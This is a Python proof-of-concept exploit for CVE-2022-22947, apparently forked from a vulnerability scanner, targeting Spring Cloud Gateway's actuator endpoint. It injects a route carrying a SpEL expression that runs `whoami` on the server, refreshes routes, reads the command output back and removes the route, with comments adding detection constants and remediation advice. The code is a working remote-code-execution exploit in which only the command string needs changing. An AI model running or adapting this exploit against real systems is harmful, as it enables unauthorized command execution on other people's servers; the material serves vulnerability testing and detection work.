forked from GhostTroops/scan4all
CVE-2022-22947_POC.py
import requests
import urllib3
import json
import re
import sys
# Silence urllib3 warnings for the whole process. Every request in this file
# is sent with verify=False, i.e. without TLS certificate validation, which is
# what would otherwise produce a warning per HTTPS request. Responses are
# therefore read from an unauthenticated peer.
urllib3.disable_warnings()
# Banner printed once at start-up: a blank line followed by the same
# three-word line twice.
a = '\n' + 'CVE-2022-22947_POC CVE-2022-22947_POC CVE-2022-22947_POC\n' * 2

# Actuator paths appended to the base URL given on the command line.
# The last segment of uri_check ("code") is the route id, the same value the
# route definition in this file uses for its "id" field.
uri_refresh = '/actuator/gateway/refresh'
uri_check = '/actuator/gateway/routes/code'
# Headers for the request that adds the route (JSON body).
headers_add = dict([
    ('Accept-Encoding', 'gzip, deflate'),
    ('Accept', '*/*'),
    ('Accept-Language', 'en'),
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),
    ('Content-Type', 'application/json'),
])

# Headers for the refresh request: identical except for the form-encoded
# content type. Overriding an existing key keeps its position, so the key
# order matches headers_add.
headers_refresh = {
    **headers_add,
    'Content-Type': 'application/x-www-form-urlencoded',
}
# Based on y4er's write-up.
#
# Route definition sent to the gateway actuator. It declares one
# AddResponseHeader filter whose "value" is a SpEL template (#{...}); the
# expression runs `whoami` and turns the process output into a string.
#
# Log-side view: this script produces a POST to /actuator/gateway/routes/code
# with a `#{` template in a filter argument, then a POST to
# /actuator/gateway/refresh. The constants here (route id "code", header name
# "cmd123", uri "http://aaa.com") are fixed, so they can be matched as-is.
# Remediation is the fixed Spring Cloud Gateway release from the vendor
# advisory; where the gateway actuator endpoint is not needed it can be turned
# off with management.endpoint.gateway.enabled=false.
payload = {
    "id": "code",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd123",
            },
        },
    ],
    "uri": "http://aaa.com",
    "order": 0,
}
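# Inject the route
def zhuru(url):
    """POST the module-level ``payload`` route definition to the gateway.

    The request goes to ``url + uri_check`` with ``headers_add`` and the
    payload serialised as JSON. The outcome is only printed; the function
    returns None.

    Args:
        url: Base URL of the gateway, concatenated directly with
            ``uri_check`` (no separator is added or removed).
    """
    try:
        target = url + uri_check
        # The original call also passed the ``json`` module itself as the
        # ``json=`` argument. requests ignores ``json=`` whenever ``data`` is
        # non-empty, so the stray argument is dropped here.
        resp = requests.post(
            url=target,
            headers=headers_add,
            data=json.dumps(payload, ensure_ascii=False),
            verify=False,  # no certificate validation: peer is unauthenticated
            timeout=2,
        )
        status = resp.status_code
        # NOTE(review): 200/201 shows only that the actuator accepted the
        # route definition; whether the expression was evaluated is what the
        # later read-back step (huixian) checks. The message below overstates
        # that - confirm before treating it as a finding.
        if status in (200, 201):
            print('[+]注入路由成功,漏洞存在')
        else:
            print('[-]注入路由失败,漏洞不存在')
            print(status)
    except requests.exceptions.RequestException:
        # Every requests-level failure (refused connection, TLS error, ...)
        # lands here, not just timeouts, although the message says "timeout".
        print('[-]注入路由超时,漏洞检测超时')
    except BaseException:
        # Catch-all kept from the original bare ``except:``. It also absorbs
        # KeyboardInterrupt/SystemExit, so an interrupt here does not stop
        # poc() before it reaches the route-removal step.
        # NOTE(review): narrow to ``Exception`` once the caller guarantees
        # cleanup on its own.
        print('[-]注入路由异常')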
# Refresh the routes
def refresh(url):
    """POST to ``url + uri_refresh`` and print whether it returned HTTP 200.

    Sent with ``headers_refresh``, without certificate validation and with a
    one-second timeout. Returns None; the result is only printed.
    """
    try:
        endpoint = url + uri_refresh
        status = requests.post(
            url=endpoint,
            headers=headers_refresh,
            verify=False,
            timeout=1,
        ).status_code
        outcome = '[+]刷新路由成功' if status == 200 else '[-]刷新路由失败'
        print(outcome)
    except requests.exceptions.RequestException:
        # Reached for any requests-level error, not only a timeout.
        print('[-]刷新路由超时')
    except BaseException:
        # Same reach as a bare ``except:``: KeyboardInterrupt and SystemExit
        # are absorbed here as well.
        print('[-]刷新路由异常')
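# Read back the echoed result
def huixian(url):
    """GET the injected route and print the value stored for its filter.

    Fetches ``url + uri_check``, strips single quotes, spaces and literal
    backslash-n sequences from the body, then prints whatever follows
    ``AddResponseHeaderResult=`` up to the next ``],``. Returns None.

    Changes from the original:
      * ``re.S`` was passed as the second argument of the compiled pattern's
        ``findall``, where it is read as a start offset (16), not a flag. It
        is now passed as a flag.
      * A body without the marker no longer relies on an IndexError being
        swallowed by the catch-all; it prints the failure message directly.
      * Non-printable characters in the extracted value are replaced before
        printing, because the text comes from the remote server and would
        otherwise reach the terminal unfiltered (control sequences included).
    """
    try:
        resp = requests.get(
            url=url + uri_check,
            headers=headers_add,
            verify=False,  # no certificate validation: peer is unauthenticated
            timeout=1,
        )
        body = resp.text
        if resp.status_code != 200:
            print('[-]获取回显失败,请手动测试')
            return

        for noise in ("'", " ", "\\n"):
            body = body.replace(noise, '')

        found = re.search(r'AddResponseHeaderResult=(.*?)],', body, re.S)
        if found is None:
            print('[-]获取回显失败,请手动测试')
            return

        echoed = ''.join(
            ch if ch.isprintable() else '?' for ch in found.group(1)
        )
        print(f'[+]获取回显命令成功:{echoed}')
    except requests.exceptions.RequestException:
        # Reached for any requests-level error, not only a timeout.
        print('[-]获取回显超时')
    except BaseException:
        # Catch-all kept from the original bare ``except:``; it also absorbs
        # KeyboardInterrupt/SystemExit, so poc() still proceeds to the
        # route-removal step after an interrupt here.
        print('[-]获取回显异常,请手动测试')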
# Remove the injected route
def del_rce_in(url):
    """Send DELETE to ``url + uri_check`` and print whether it returned 200.

    No custom headers are sent. Certificate validation is off and the timeout
    is two seconds. Returns None; the result is only printed. A failure here
    means the route added earlier may still be present on the gateway.
    """
    route_url = url + uri_check
    try:
        status = requests.delete(url=route_url, verify=False, timeout=2).status_code
        print('[+]删除注入路由成功' if status == 200 else '[-]删除注入路由失败')
    except requests.exceptions.RequestException:
        # Reached for any requests-level error, not only a timeout.
        print('[-]删除注入路由超时')
    except BaseException:
        # Same reach as a bare ``except:``.
        print('[-]删除注入路由异常')
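# Run the check
def poc(url):
    """Run the full check against *url* and always attempt to undo it.

    Order: add the route, refresh, read the result back, then delete the
    route and refresh again. The delete-and-refresh pair sits in ``finally``
    so it is attempted even when an earlier step raises or the run is
    interrupted between steps; otherwise the added route could be left behind
    on the gateway.

    Args:
        url: Base URL of the gateway, passed unchanged to every step.
    """
    try:
        zhuru(url)
        refresh(url)
        huixian(url)
    finally:
        # Cleanup: remove the route and make the gateway reload its routes.
        del_rce_in(url)
        refresh(url)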
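if __name__ == '__main__':
    print(a)
    # The base URL is the only argument read. Without this check a missing
    # argument ends in an IndexError traceback instead of a usage line.
    if len(sys.argv) < 2:
        sys.exit(f'usage: {sys.argv[0]} <base-url>')
    url = sys.argv[1]
    poc(url)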